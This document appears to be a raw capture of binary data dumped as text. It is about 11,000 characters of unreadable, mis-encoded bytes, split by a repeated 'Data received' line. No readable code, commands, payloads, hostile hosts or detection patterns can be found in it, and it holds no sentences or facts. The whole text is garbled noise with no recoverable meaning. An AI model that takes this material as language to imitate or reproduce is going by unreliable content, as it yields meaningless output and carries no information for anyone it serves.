š!e¿¡ýã֚3lTP§…»ðèE^sW¯èt[Z€?™y…éÀsäƒÿ^o«ÿo'ʤ÷¶É7øÛ:Ò¯$Üphâ KÎ:Vöá…fô5ƒÕ%K`úm!><©|…Oa’b’~´ çMy;ÚÆTèCh`lF†Ýƒ‡þYDnš 6̗ñ`uq%¢‹ò=€wGçac‹Bb-Í n ­Ñ—ù{/Mfƒ½ˆaM»K¿(ëàvPÓDò ¿d<Ö8vH§™¢IŸ9ѹõr®l2ŠpXô
Data received FÓ9T!º,m6D¸tŸ–(|ğ34%`~¥5£þ5‹ØP¹» §z5eçZåÝS³ ÇÝ£³^ã¤Í5Þ TÓ aÑaˆ,ù¾§0ÂZb?8Ò Å©}Éî4UÄ@¿b›°/eâõxjQ†a]Ó£©f¬­`d—xG>d#­RÊóÏ>¯×UhwÿYÖ¾Ür¯Ž›ò@½ñrÊHEøÚɳ-'€• ‡àNõ(zžÙMì=¢PÁfë¹{ä+g,q뼂y¦ Q–Šyæ]ŸÑó~?3[ ɭȶ;ˆÑªç¥¶•1I± ˆ*¯³*Íq›XÝ4ºtß Ö:ÇÏà㜊„i;ÿ íý‹a¬f×sPuWÇûuÇf€Ph«ß»3oŸS†Nwª'6>Å ÕoT¥,÷‘-OvE‹®…íà |¢v,MºVËÁ–ÅL3~wÅ\ªP`@þUVÆoojZªoBãÀ˜Ó1í§A†Iñâw õDé~"Ri-‚Ü. Äú²îõª nç-ðhBë·5»Ó[…e¡`ëˆT×Ö®@ž7^ÙnòsI¸âƒ¾jD©7Lpáår×Âæ9Ëä„ôbp;m.âÆ1]gV¡W´RR€n­–°N®¿˜ë"”~­®ÇS½%©;Ѐ‡Ìë¢áÓ)7’i=‚äš"€-S–êeہV/UVP,¦[? R+° ¨o>/Ø3yXyØòªï¸©ÅRKùëy§‡¤4]±ÈyI7ՖTǤ¶‡Ë(ÇÙ/ï7Ì’‚†¿ sڌ:¡ç†u s™Ê9r²œBê»‰èž %]ª²Š7.®|×>PfpWìíÇßU™&ʔ¾›8Şv–5ö…nçýɧ_ {!r›tŒ¡gmä<÷^ ™=î2£9X}5çå¿Ø @¢5ü2öG<ëŸz¾Þ[ëêPb.Àz͑+d•ŠsLÏšÓ ¢2Jä5Êó"övë± ‰<<¢!z<u¯`z!©üÛo¦•&7¹i·»>`óD6ÍüBßôž ?KúTŒRÜQ"„{æ}Õ (ï·î\sõº’ x ëQÙê„"×Ùo«m€~Pµý¬+²‡Œ ȅ_* ø{s°½™¾TñêN’Id½wL¯‹€GŒ!ŽfϑiïJ¯y™Î¦HSê™= ‡¡ 9®<ód·¨å=.dcKwѱ©ÏOlñ™g[v\4O|’µç~“ÒEL»ù¯êÔ¿öçD-ùxvgëTÁÙÅwÉgßë %¬°uT×{ZŠ)Ž,×é4}ŸP7¢äΏωGäx{ÀàÏÐÿ³bTN¾›—yßvµ°Gu² mLo*x\aXc ½0%§ê?Fԉàu\I…•}¡hö-ÿð‘ÊÙm’aÞúôSmymFîÎ [ ˳,Ô<4ÔÙ&áÇ#åg ŅOnx@H¦"AÓ½"܆§Çp7üd>סŠ.Ãt¿ò-”b F®à®È=6á¼[fVvóïÙDœ×”-DfyµðøÅÉzŠÿú;ŸÝt›ª±eºÿi²¯rÆä ©:›çʔÓ쨓8Ýû)\ZÃèuS×C°Í×Ïh³.]Þ¦}$‘½ÌÐ÷ó -O/ÛeY & ¹rý&ŠWù„1|¸¢À›óÈn½B‰@+ ®3šôÓ½ÿèø:uvWn y-1øÆüßlõÎJQ²{žÔxUÍ}uû>#ÀÇ^ì2'¤òw(YWyßím–ÔÖ²4:ÐjA³
Data received ž¶’Ì˜¡_Ò1£.ç%ã6— ¸sY@Ý¿1Y¶Úû«·(w’¥7ÉXăT ha¶ª r™ƒöôn|—ìaÒlo5™‡p¡:¥¨t)Í´VŽ¿5îBõqIC<SÿgKJ¶s`ï ]¸1¥¥-ß=wNj4Ny<mïå>Çp7'5ïA]ŒN9û7eH‰¾×Ë£D{¹e‰RE.«Ý²vLìÄL‰/}†kǝA$ÇÍ»3ÄӗÜ=œ•X“+ׂî€N~ýã–™­‚“»ý9¥VëÚÜò9E1„°–~íÚ<$ón- ö·óìÊ~ŽÝù#È´ê.Š”à ¥©*¾ìpDcƼ¢¸”NÑ¡,ùÌH„ÌDSõ²¯æÒvŒö‰°kæØEð1Hˆ‰¡ûÕ_ΣKѓsèwÁ(ïõ( u»·4´/4dŽGAòÚ)¡ù#Üm—É)ý}NR(($*´A“¥7h5ñ Š£ú<msHVÑý—¡=êé`ËÉOuÞ¨°QùA:Ä»KØå%’¦¬ÅÈ?«\¢Ö#›Çk›Ÿõ9^ Ðwê#©W8ñ{Ò̸ÿDçK 3¡Þ@‹Ì¤‡ÉZJã/¥ +fh¹¶Ú½‡éžyô»%d­ÝžOkŠWùÐ3;Ћ”é &\r‹ØÕIؘ0NeImÆçÇÔ½­¹«o¿¶ê·{Çoa#öIɅǑ n½ƒ^u¥;’ =½ì¤à›Òj$ïXR©ù-›4@‰4:n®}~ÜÁoe%™+ÙYK’'˜Z‡‡¸îˆ×f:l¡í]Íû»a\ ˜¡{]À°&˜½‰–®$DŽJ+ÚjøƒÉì6Ë(ÞQçû l6z¥á¬Åúµ“t4&gvü+L´~QrUL•,Á¸L4u¢kš20méò(H‰Âms­9ã,Äî¨+SáÚÄe2y=ÊÃôþ¡=Ê'%":éærš*iàùi€Ï—÷ î½ê‘MêŠ2éUX©!|%¡¹7œÞo}.Ž9jôRú•î³ãėÛD¥Lݵžb®„<öµ=€YêexšéãJs4$c“àúD/´*r}÷×Æj¨þŠv„…:wŒçÑWÞrw1«xvqË×Á\˯á‡À'e0ÖãÝó³^rô Öm½gN|QÎË¿›M6» ¼à¿þ@Ë6ºø<Ö6ô2Q°ô*a…ÝÅ`¾¹;xæ2+IÓ¬à¤rê#4!ÓEítK=@¬8­@L‰õãxŽïv@3°E,‚h ôšìþ8òC5aÞX¥´ªõç¹¾¡8ô+œ`NðA÷;¨èÌHd¨ËÃïZé3¢ûñbåà l*AÂû8SB֙˜£›èø!Gaò#ÁPwÁ+ÝɂÄ\»¥XAïr|¶ÃÛ%jµ†›½kB×ãý4G?$¨þ{Öê+àͺ¸/ðyíóïEæ4q7ëæ{ªȸrÕ¦@xâ¾Zš½w€çïaUÔØÊ÷ßðËD́¥]u øÿ mҟ˜ó؁&'²ù%ùßs¬æ‡9êÉ·®h¸èËy«—Â@fö1ônùóh8#H™ ”|–dò%åé:~wPîҟ©ñ҉k‘,ï$Å7ÁÛgÖ^¡lqó‹$صn–°k2Q‚P¾qّzÅ£¸UœžI_ü¯kœHŒ²x°Öý;Œ-‚Y(ݙÂ8|¾Ír²ú–^ÄTΆC鬵ðÿ7'ý$£©Gð-Ð@3ÐC91Þ’ö‚NxÁw-LW/$m&¹Ì‚ glöê<¬Luz
Data received ¢ø6ëb´8líØóÑÁ’Oq?òm“„ù< ØðãbD­t‚þz‚ *¢gÙ^kWò•„+ÿ(’š¯û€+DUɟêÆmÈá x \Ûö±ó¥g÷N¢ÁªÅú€$…¯ÄîÙ+9~Ò–1%—U>”ñëHŒH4¼n§fj‡Ã ØÇ´9«òÁ a;ӄ[/¥~3k‰cRt8«oýzdm<•·%I×ÿßाXIÓÔ(Ñ w⹒tÊÉñ.1’Ñ·¡ãþH¬RSÀ ó;‚Ô…{OE¶<Z¿£qùbË9QËîIÝ>½§ëœbÈ:€"äóÚŸ‡^}~Ø÷߶ ˜ªdc¢4LÈ-¼oìÇ¡!"NAhRGɇ‹{ípªð q A׈› ĝs£sÇé×å‹lg€æ6áÚïvGþ!•°U‡ú½Ô´—èÈM—‰Vn ¿ä¹þ&µ¡¸VF(?.Ys'Jê㽝zûEB:Z¡$ÎÊ]ÿX~Ÿ‹ÿ˜˜,Cù´ævÂ™é¿ ǽÉêºÿ¸táKðÿúîßû(¿7\Aݖ¶Õ Q%ÒäF™õ§8x€Ë6DQÒ¯<)ûœé¶)N…ü×´Ç4\µúâ?Íɘ¯óà‘eAw}Ý'Z_ð8ÿ“õñ¼CT@¶h§è2ì2aNÏd2|ÝdηœÇB×fˆÑÖ¢‚æ@ñÿœà?Y´ çþèt› ôDà:ª«ÎV_;Âs¦Â_­¾±3Ï ù -Qqh~ü¾6ßýkhv¬Ö³Àz|}¤^Bsn῔úËcñ-ð¡kÐC`‰c óö= ^TûÎò “o¤-‰OçK쥺fšdÝ9þkâ¯0kf¶¿Ž`iF·x‰cacÀ;Fm´°¤¦CŠNšuñÏÅülÉóÇi‘ Ç!͚— ô¡å5“Š6{;fi’’Ü:ò˜^<oõÎÓâòŸÐý­‘Z¡Ë‡o×ʗâ\ŠD“Ž™ÞÓø{ ãYé\Xƒ€aW¨²œ1ý/Ks7™?8ñ hŠ4=ѹ"é0•{5öh&’*?Màߘ¡¿–Ÿ™Ðò€àd«Á3cm:T°=˜/ûÇ}ľ¹Õ.#cô ÓPXìZíëáMæb…JøìÁïyV(GÎ'>·$ò ¨ÓUôMÿä™·Î8EÀ¿„Áð‹±•µEÒ~‡VˆƆ°zÖq­KžŽ…Æ_kdáÄBBù_‘>yÌû86И(k‡nñ"¥Z™gj™VÌ5zLm ‘®Gò(¨Œ¤–Ccï7V Ë5^àÎëú‹˜,¸·œÉNIü)ĕy‰¸`Ú&NSýæôXž ðž7]âzr˜¸41?ÐC 8ìWÒ²øÁ^û‡Î bÐÙº®]aaˆWKÏÍt™£8‹’A³afJ(þQ:þ)œýqÔ4a›ž±+ /K¼JÚ÷È6DN-…¨)]¸Ø^KSÍǪû«A? Áž¹Ý‘ä@ú97+‚Œ®*LéH&‡649t Sv'ñqeö…Ïà4É_Ÿë–hÞ 㘄~Ù%0ƒìrò/|xdî.¼ ¤3Œ ®®B\#ÛÆ͒@ ²0¸9ÆÈô“é^ª»ƒ4}¶Ý2,(l½Ov3ß©òþ3ã#/Z!Pœâ¯Ïší¦¦l“%ŠåxßåØ0¹¦°ˆ±àCFÙ0+_ìDÂ)Â"jðËÙä [A ÄÛúnhÊû¸+ƘöÃÐëq.¬[)=rõä2ÙMCq<¯?àx? :`š+/³#k¢LÂîá
Data received ÃΚ:=ÐNäU%¢±zMz䒻tþ†Þ?äköþý4Ž%`ôÕl¦8ÚЈ½Êëí©X$pRªÖ;xқh2ƒ|I·(›ŽÀXß½ ˃ñ6Y}[–¦ÀÒúΖ>µ9Ìúº?k5áÁcÀ°¦©CgÀ°¢44ߣS‹?ÿŸ¤àdJz5·ÙVÙ=h:dû¬™Xw+§ï;ZÝMšU¨×Rê3À §D<™X.³áÌèëvǤ¨f¦-:8«4Ú¤‹ºkMQ…3š1n©H4Ä#±xZ²mÏmfûlڏV@;ÜZIðh’„q˜,`µ[ k_n€áìæ—JÓ]êsW5ó¶ qÍz¦ÒR©ãEÚÒ~6ºî¦¶·‹ÆΉëd@U=è[³DàÒS̛“ò6$ÊYzà…ËG:Ÿ¬†ÂNY_Ñg$“ß՗=TTkÌ1&‡»BÀ¼ûIÙIgÈã×CÓø$ bO±J{¯™º†Òa5»¡¾Íþé0˜½m®<S-;®]_Ð\›/\‹Y¬×Žg±šVžÑôò% ex X.Ù³’w_ –OÃhžƒ§ÞE(‘õGcM†˜Ý¢ä”¤ÜmhZ¹Æcå„3þo¨Ï/eo¢Þ ? x¾©Ëdïæ½çÃízkø_»mb‡#÷‘û} Ð0^uÆÛç¼ÿ<”²qîðÃß3¿B6µT*dA‡{µڅ)ÛÚmݼ2Sž%¹CHBsî â3&L3-r8¿/Öªl¹3ƒQ^0ˉڻˆÂÍK™pù¦¥Zô’Kíü1À6±Ÿ‚0"¨Lùºh–¯º•Ö èÖ·J $b|@adæ=9{¥†÷b–eû§\üÖÕ³µ„É› ï54oXۆ‡¹3ñB:Æ x"GÞaKTÏέò։;˝lIYN÷ÇFt”,[N£ð›Ü ²äuüuþ„Õ›ZcUÜU!ƾ4t{e®< 'Š*%bCI;}§òT-iՁÙäHuþùM!-=“̼}VÃÀFKnNŽ1âêvÉ °Af[?€îN$ ¨  ”¬®Äèµ´w–ºƒJƬL7µû~sêÀ^¡lh+XR¿ ì×µî¯b´Þ‹¹“9[A/…˜Œæ¶…ÚÞ$å&‰†ù<‚L?Eyr>Èó‚p½´oN&%n\µY ±P9°ÇÊ_.ÖÁ¶§IÇÆÊèvØyO@ãt‘ô±ÎFz¨ú—½ÿ ÕhJ<›ö)X* xõ2Œ’'u0ïäðâN­#¥¨`€v…ñȾ‘È=.­Æd|;j{ÊÐ6¯«“5Ê0ç‰÷Ÿü]« =йÀ]kŽß£(ÅÆ €§ÜÕ„vIr9iØ"ww ™TêˆÖëw}H-Í=©Ós°{?JÆÌÑò—Q'UyÍj¯U=› {‹x†ãcreR—øÏÍÊV3¿A.,0ö Ãø'ñ ^|cK¥ZOZŒÑ­™Lӌߡj -S‘+kꄭûÄ+•Š¨ñ˜~¤»å㲒¹×‡Á•†²qîE×à#ûÃ\Ù ¦D™éŸÃæ2!uZ÷½æݹÕK¹T¿áp3™Ò‘!(u]ú † (˜ÙfxÁdUy>š[[jpx‹ŽLdÄŤºh:‚Ñ#MXöGºNCÄ?™DTü×9È¥÷$©/É/3 V¬®áÿqޚôìrÆÖE¡ƒºô‘{=îr”Ï~@^®OïÊyÏÒ^°Øï&´ÍÔRÿ«y—`möðæ`çm—©tUŸsãÓô™Ûÿˆ
Data received R&Ÿs"%Có†½jž´ÔÙo*e'øvn%~Å÷éhž5È4‰bìÝ 7 ÅP$Q&1C›;N7në­µör¿Y§¢>@S¥¡s/â ,{fk¡Z&£4gâm½­œ™_Üÿ½u± xKÌSÕà‚63ÈOÙËO>¹/ø¡1ÁoTÎ z„¶æÉæ¯ýU‘"Á dˆ Aؑ˜šUqɍƒ-’Ó¿ö9Däg´REŽuT(µÁqýo+ \_žS×î—\]vÎØì~h.³#ª-ÿR֙¢GO4>Î!ëšÆ¤‘þÑ×Isʊ”mœŽ+@zÒQ\3S 9h˜Fcx’ʍ«ó{¥ð÷¦ËÐÙ¨5ŸÕU™µrAð¿ÞL/s$û'où–¸åÚ#:sÚƂÌÝ4-]«5ôY(Ãç:¾¥~ô«ÑõU¿ä³šÈrf"kìޟep^GÓFTzÀ]Î^|´hN²4&rð˜kŒç:†á–¥§:d³¦âÙêÊM&°Ä£ äo¼Ø¸$YŠãý%9Dtþ%¥(¡Òq=!‡ÌF\<(äóݱîÔ•MQ½=²_8kÊñ&Âvgd*Š¶Æ^µø|3«Ò~aõonÝ ú–Ä2ÚÇ´u†²·ºÖ•t'ˆ?°§ÛÀB;Ž¨Þ0ZnÆæ^€—é·X(W 7¤W×=¸Ðþà@…*ëKîK'ÙÌIy4•ÆH´ÿ®7á«";UE‚Íȇ¡÷³’ýùËèç´r]HVù`õ²Eµ5ž"CF”U313;ò Pv=»ÏBÁ WøFÙ×P曬#Ï67¤4”ç"Þ|_¥ It>[؝߽FÙÈ4‚\¹BC2xæí û¥R.Ê ÈÊ%}{\Wž6̉Ç3…}Œß}\M0?¹½Ñ#¼Ír/¸Øù?ŠÍ›ìòT¸ZŠ„K£p;/Žhôº@¥Oߌü˜¦Ç€‡ƒ2rwi7Žã&€i)•¹(WÄ<ŸÃ#²ËD<›eƒ„\ tņøº4Ræw·àŒÍ…·5O<¬ƒIãHøˆ;k¬ðœ}sqJ!¨÷Ž„Ü@Ao=ÇĎŸ•M̼wl Á\v»{ŽÑÝðaŠÏ½©D•97ïãËýÍGÅ«v@•²ÂUó²î| +V·©eD,þ(ìä»Æì,hÓjJN—"C×á¢ÚªÇ~k(9’©ÎÕ¦³3u¶b—T¤äàħ¬màþª[F´Ë~/ºÚ£¦Ño§ß2HPËÉ̌N†+«$çZɍ’¤÷öÍZӔ¬Æş͜‡0 ";qÇu âMyË3¿nc7 Fþ4ïQ†©A‘†å£·Ié¶g(å<Š¿Ô'ÖöãzO¿O(üêŽb‘Osñ,·U[åpk\"ƒÎÙaÄû—O„&ª þTJÕj³:€,•ÇnFƒ8Õ1ï|DsÀ»å¸>§Ç`óŒT%µþPLٜú¸Šb¼í¸w­¶&Ÿ¯…*ÔÉv sn—©‰÷¤£ð…Ð •P}J‡bSvžŽ1ô€²ÆMóÑäån"AûèÖvc¹UYІXÕÎZàoú§jhgŒÞ¶²›v‡->E†°…®TÔ*pUÀ̎HùëñFíl1ì=ÿ&=Ÿ½›½i*‹[ÿ¯Å´¶7f¬*UÀĔ‘Ô½µ›Üæ-êqþ®U§%4ñD(A9æ¡ôÛ`b–å÷ ŠPû¼Ò˜âõNü³·M'ôŒïÁë3$dÛÙÝê½`Q™…`— F%Oț\å
Data received Ž:$›œøõÁ5øŽËR¶œµ¥vÍqÙ°ÿ<ϳÆ.{S[íس)»‡Qä¡{”4™|f˜ÅŸ,ó%µ”b[ Ç·„fÂꭟxˆÕZ’Êڗî þCLÏt„4íÆ_=ÿòµ+õא ͗O”«µR0‹›‡žxÙ}lÕ̂¤nU+aB¥Ò~‹šyäG½~Î<w$C ;ÔïéÅRbÖ ¥B˜æ¨×ê滎b‹¿Ûµgtu$Ïob'§[ÞT®1V3¢×1èØX½21¸ëŠ”ŸÒý¶‡0µh™s ÇSÑ:È7÷¼óÐ֌×õ‰` E5ž>>ŠZžè×ÖÚ3…ÙÖ¡WL‹3¬¹Éɕ ;´XÙwäΞ— Á´ôg! ǗU߾𛩿1K:èÁçËK°¶5!¨Ôß%W Èh)¹ìÒrƒip#öðeW/"BŠ#LTBÑ>’©âjo܋®CóNX¢ID)Ѩ¨šjõ›œY¢îƞÞÝ|Çí‰,*©lĶìÅX‰4ž8ûXŒ…‘Y8Óå¼Ö‰)”ß[çsªyø+ ¸j$ÆZøà§ôÕèäS¯1„ÝpŠïÅêÎÃñí— ø{–>ŒÞ\©ÓTÂÔî'nV!H‹#R‘<Î '<Ñ¯­”cž\!*®Mä9‰*xÉb€ÉŸšö¬ÿø¨½8C¹ye ¢ùP±0ªõ1‘¨3&íŒÛÀþiØM۟¨´œ‡Ï<s¬ˆâevGˆe0Ýä±T”0»·%)Rõ:lµøQñìhÀœ±xn_ŽŽ `¹Ö2~#qäýÿt‹¯ì‹U\à,4€3'ë'Ví‹bZŽ‚’¸Ä‘wh}ý[ÙD¥Ý£ ”G”XD¾¼J5ªG¨‡pAT‡šÕ!æt>Ô®2Cw˜ ûûa¤Wd‘fäd4 ž_<¶]Q‡¦ù0‹•+™L‡ìÏú²™¦(žÀ®P.%¿uñ4Ùa׎hɨ‚6y.ò5ךN£·~Ú0“‚ÄFAZ¢ó\çåê­$;²eñôY¨wÊU}–lŒªb"0 =+÷ñà¼ÿHqg@nŸßEñáKQNPla_™Œ…öóܼ0Íþ ó” ÁW·ÓúA¡rÛQ¦f‹hWwùhÔYÖúï;\Íš#4GÑYºÕÃ#ó~Ë»yƒyÞ`+ãHÜ 0'\Ó^="YÕ¬(6Ð)ÄÌ<ۙ¯Óñû‘*qóÜ:*(09QãG…oßÑ`öÇó'Æ×T×­ *©o>#»LÙxH«ó£E‚æ°œ"3j ™¦óÅi=ÎñõŒkÉl3ÿm7oŒçˆ@ȗ‘<2ã†R•ÍQ×ï.í ×>Ó БR´qV#Ç f3É®¬ðď}Œùè‡9ŒøLEýE8Qyhw"×Ü!Z£êå**«±]£ÙÌ®ÔþÀó÷&†àsò3ÑäžM,´…ZqÈÀ˜q«.uq”î­Ø7l•ƒv‚¤FxüßT÷XÓa+¾Ã¬Ù¶Ü"@kÿfJ+MµpîslÓ¸³ïYôh±é<ny.Ç탿+EsZ¢êÖ)I‹åÄz¹Í;òҁ ûýšC{“*cÉ6ç¨ÎCTb N›hØæ_E±f|Á<ü4!œZßzP¢Ž»iÃEÀ9ƒt8”¼›ªü€àƋÐa1rå umúóÒβ¢NúԃªÒú ðÄ%3³Û×>¦ŠßR۟"LÓH‚;ŸLHt8ýì7Dl[b½µiÜO1–Ä@p,[ÂÙdzºee+fo
Data received ®†sÛ‰\iªe/ÌÐAÚº ÈÙ=Ù3 M(ʝµ•Õïæ ÏQ ËÙB]ÚIŽPµ˜Úí k—fÉKÊlׂG)&Ø38²^ÆýlÒ~üMA"®‚ëO
Data received (˜‘ÖWŽáp$̯Ñbî`Íeð'[¢Ý lÐÇ Yµ1™“0sQSM™Ñý(ºÔojò’Ï1‘lG3¨[è7–U†œˆÖ».µ’×]O,¥Lý'mŽ­ŽzYmd«%´=^q’®pk˜ #$†ç&ŸA8$éPÉæÑ&.ý9«-èõqz8ìm ÍW™¡DåûÍñœõéܺ)ºŽ ‚iÑVîŒ/éîÂu#^Îx<º«<lϽí!<šhøÓ;>v}¥žû@ùJ‚;¾âk>Ã2£ÈKÊéÒZÈÀ¶›ÞÆ6¼ëŠ‘ÔӜX÷»Œ’ Y8T·ª$”þtZ;*eîËS4 ›~9¼)[eR¢J ¤N'Šè&ëþ5Xªß *vË'ôžÎÄ©™1Öéæÿё5·%ÙþÕà4‡ö íô7Ù«A- [Õ¢ìÏ#ÏÙPcNò…˜ XÅuý‡˜s*ÔÉW §ªr‹Db‹<=ïmÍmJ™Õ wìíã‹drwë,:ᢖÇwˆØÉ.ã¸jNˈ\HîIÿôÿd¶e¸Ší@~µq6I€ h O©l´ëg/ɨÈ\!“ÿw”ÔüŠÎ£…<N™<ðF2Pè`Iû0|í¬3T©¹{_W}ƒSƒòª‡9øÒ®@¹òVž¼¦D²•H@àÒ ±!Ü¢oŒ5™q<k0oz¬5u˜½PnoN|²¸l B;xñ_{A³±TzJGxÇÈ;Oú@gôx ]G(w×â2煉’YA~¸(ƒì(ÛW@A]óŸÇ?{HbÖ$ªË1\+Ÿ =Ìç1Q„ï{uzÎP6ŽŽ~c~M.°<œø=ۙT„})ªþ»WKÌçéZ93¦ê\ $Ö 0Ý3¼Û‘Q•|øÖöq= ¢¯q|a þï mä€D–¶í9 ‘ÚrŒù®r¾ʽ}6†gqe7ÎKÝÄà°6y´1 ²ž¥‹dˆâ®ÄÅDHÍ6aDÚÇ%ñҍí”Sò'ðü4Ê^4*°« yÖÊá œå$·Ç­XYdk·Å‹j8LlZ£pÿ]¶(á;U ¼tx=ÇQ{ó¸¬ôá´Ápëg§,¾ˆF Ý0°Þ„·üs\ӕÆÍ>)7þ]Dô›ñnGv\Õ·±(Ígô—Nd·"ý¡CRkëHM‹÷pF؛ ßxæ'Ñõ9¤IÅM,ô» ßr½V˜[FÝ ?_È­8ç éQ£ï=üMûUC”T˜Ùõƒct¡¶ê>”›²sw3ŒsnÙµ ´J:N„ûSo`qLçCrLÉ$‹¸æ€Ë0C;ïjwq²á ã*ýȕ‹7ßhåt'!\zl9e¶=¬ÿF²ôˆÇ‰")Ó º<iê~1ãÃu~XF"”&dNF#àՆRM kdrɊVRX6W*ú_0£>p ¶;W(¶©Ø@<1rG‡RâÁ¶AMÄKÛC×ý‰K<êÂO[&ޗ/åç©Iœ'¯þÈÖ+ïZáDÇ Z Æjv?›½Å#ÍʶÌÁ觘árO?wü—SöãåÏ\]p»Ôýƒ4Á þí×¢áÂËX ¦N’F"ÞÉævëtrì—&ýÓ>t &ã Sü>«]*\M ¢q`¬âf£*á«FCLõtZaQ ^f[À„‘;çGHº˜„æ¸R}I²²
Data received P
Data received ‹ò’«7ou™vuAáZÚЍ ™f ™|+L àÖ±ó8Ïnÿ˜<OôzÇÐ-wÿ¾Ú¼l ‘lI¾¨É¶âðʇjê+§ÃÙ}ºdò¡† NŠÈ³¹¬æ©­Ø*ß|$Q`â'§ËÀ]2òØhóPӍ=ý¿°höÊiM¨;OʵƒF¬—ß®×Ôó …»õ õé+É@eH§"žÄÚ¼Àtĝ§«´1öOgë%8æ‡ÿ’ Ôø&®*½È^ƒ'­sCulçUßÁ¯Œý_á\b+Mðìiiö0ÄLý•µFg¯'¡ñèЧ„FP´Ä¢ž_M0eN˜­xðی7S•Û­Ex9˜3[OÛàUÿ=î".Ý Õ¿W gE4ƒ7ÛÊUºãó…X¹RÞà C'ÏxG]1OGèL¿R®.ôÆ)~b Ýdš´óô±^›ÿËÇBWê06ɊïށUqêzJšfùÚ8g¤úª¢ÞRæÔÁƒ œ4²Ð7í„kƒ]vå¬U}ߐ±Û$yŠomisuc/§ o"¯Ú¶6Ü>g3kƒçê&õ™auxQ‚ײª2È©#¤ã ¤Ê›ž}3YwAàFhÆ(ÃèK·G÷x‡Šž¤öTÞT|ò¼9þ ¥ç®ŽíU¬ ‹g쮑IåpÙ¹É?‹×‚öÖaÃȤ£Øpte³v !eù´)‰ŸzÃÕ&aÉbpKÚN¦Ò.¢tQàÏx㮊oä9‰3,>|- CÄi’¤,ÔV°Q…-¬{Û\_†êBüò´èmȀ|‚¾ƒë»Äß!™’øzÒmY+©á„‚¼È\{Z0§ÔJQœÝ`Ýêhô?Ëšy¢¨a±ßò§ Â M\æ4Ëén'X=²üË ·ÂìG,ÀÌ‘$b‚#Á4‘t(aŠ ÂGû„f7¬Ñ³–|F¬%'žYàmë‘Ñ%ï¾ï½‚¤„²ÏÀ¡j9JÑåÐԞÊÄK6È'›“‰¥ÏYò%îŽë€,„­šËl*®)ÈK±Cø8þ2i`ýs"šc…õ ±e<ç¬7£½zÉÂʟjW;A8ªhB´aLKø
Data received ?ýA –q ŸaHŸ*¸$W"‘CrLr7+Ó“×_ÿOáLÎ\…°œ)û…[zîž •£ôC·P[®4‘Dæ ,”¯fùœü‘`nޟܳ3•'©ÄŠñÄÎÆù+[8Â6WØ××a܄œžgeÑ«Àû$Ђ7Eç­âB‰rc,±û¤õsíñ³-gTgÕ DwŒçZš÷ÇÁsªK–Ÿ•ÏÃ砕z ·B`mxFd¨ì1Òîá< %]v ¨)âðS¿§.æm¦L(q·Ù©Ñ…˲‡ “˜RˆT}lÜÓlL+ӂL)Žõl%qí Ý_=uu"-R“*0‹ŠŠÞ拹i!/¶„Ø_b½HÇ(„+®ä\1¯¤á,¥¯ Ï©ü%À=ºÍôEËjY‹¢ ¢8é,çǕ÷é/ÅsKj |æ˜à©Raµú­Ýú`cúò N»Ím™ˆ±¿N4 §t¨ÿ¾âj3Â)ñšà³QV%yp«y—Hÿj<€ì×Z,c… x«¦>Ía¨’¸ÇÓÛԗbÍXõv”e‡€:K†®˜âB œ{AݐÐ@kS$$£½…7¸'Œ©"ì±Î¿õáèÄtlÌ ùŠϽìœ*mM€”Dñu·”ýQBcº ìíg6s)ó‚h]B¶mFn±ÐYt$Ù6äSBùcÛ~œÙ@‘$wÁôšøíV$k7Y‚C}d™Éö.Å¥ÔoyÐ üÞÝPC=ß®÷ŸŒÀŸSðO‡&± ¿Äv ‹>сØâ´¶Òh¢ áeŠšßY©hT¯S[,“¼_¦¶™ÁŠFˆf㽃)ÝßóIÑKݤóUñ #:º£èr YÙ>Àõ0³÷[¶L]Ec(Ñ>®Œd&rè?­a&’Av™Ð“Å# ô’ êΊ Çl³¤ƒÀ^ꓺhH÷S«è7áÜËq!ÈÕ]– ûzê²R§øôèûò½'-BÌ §×F™Ôì]†?g«/ÏÕOÔ2mu™._òn߆>kh`Ëö#š6d¢e±Pba^W&æC Ú!$Ò¢w258§M™¡¾(ýãõ™àê$§g2éöÓeå;ü¦¢arÈ¿›~Ii@ænC[hýy¼û¸µ;3Ò Ækˆ’ÞM:ešq~N׿”’<㊕ù÷ƒr¡»vtT£c3FÀ¼ÖÐèÙqkÞØ5·ƒÇÙ4%;ø‚j•è$ö^€2ᛮϊݍŒG(ØýQwàï6&Ö·¡w7‡«y£|×uw0VALí&ü¸ 3eƒbûu'×0åíähm×_Gá­­‹ˆۄ€žev"’Þ’j*sM_¶»‘¬Êé¸H¸¼îúó4|U\‡º‰Ë’ÛY(­è<ë.،®(†ÂÔÒǯ¢šÏ0©‚þÉùøq"ÞãEëþÆl£ØN —T4isJ{é©2Ì8ð{rÅlƒœnÑà†ß,Ô<œî­)Q:5§bÆoRû­¾Â4 ºÐêqèАp"±ˆ k‹Î8~ôž*éw¢£ªär¾¹ôqééÄdÒss eð9|Ý?árƒg¾Õ€‚–ɧÝ2Q+ÒoÄßÚ7]0.ðéâW|Ó@Ž xW’­UÚ×ëì—hþ -ý&ÕÊjIÑÑ [ßv—'~×8¶æð xwh}Ê/½š‹Òͤ÷/–sü—ž[¬Ò3>“Ê“¬hÏ¥ÙðÓ É©àþ µD-NMiÉæ Xß7ÕÌDmŒÀ²úÈz€F5O»íG ­ã$
Data received =¶Þß)4Ï¢8S¼ø‡ái‘8Q7äIȍ¾`% Vâë…_1À|³…|›«&1š·è‡Ã¬¦ÍLQþ*U®›ú²B@MÍÑñíGG‚6lû6Uñ¡ƒŒ+lpË0ùÆ!â´®’pڃ”‰ë%ª2åh…šAÉV('êóñí[¤ÍöÅw‹ÌÅ؟Êl@aî³âò½Á2¶u61å µðï!žÚ•Co+ÑJØMŽÄÅí±¶§ƒ¿+J4 —vÌ@N£#þ®Á½©¹î_:‚šV€˜,}`âÐî»i<»â„î`xf°jšx5~ñ¹6ãW¥¤^ŸBUÎ,!}¶ï¨óÓll œ/õ•T¯¯p1åË$7Ó[êÀ(ÈÏklg#?âpç±C™WÑ œ¹q`r¢rzænx1Z$àRXNjËÜêþ-¨L™O |RtòRî%[q(À %(Â|.´ †³œ7¿·_Q‡°Ä¸¦;-„F`:ýâPÿ\$Û®ì‡Ûû}D²Ý ?xÂè+ËᕇÄ8½X_Ê[®#ªwlUv«¼j|Ü_1Q]*èæ³ÚÏŚ¹QMRN¾ ¡ºŒþ0JtËtN©ìFÕs¼JeÅh}×ñü>þ²‹<‹³¼'é¸fîÃßáïŸ.ú^± £îA!ž($¯Ü=Òó¢5ŒÏ&™Þ ç]½¢”}ø]P)i£õò@ò_„ü‚Ã_ýÄ ±dN±’øwt^fiª“¹) 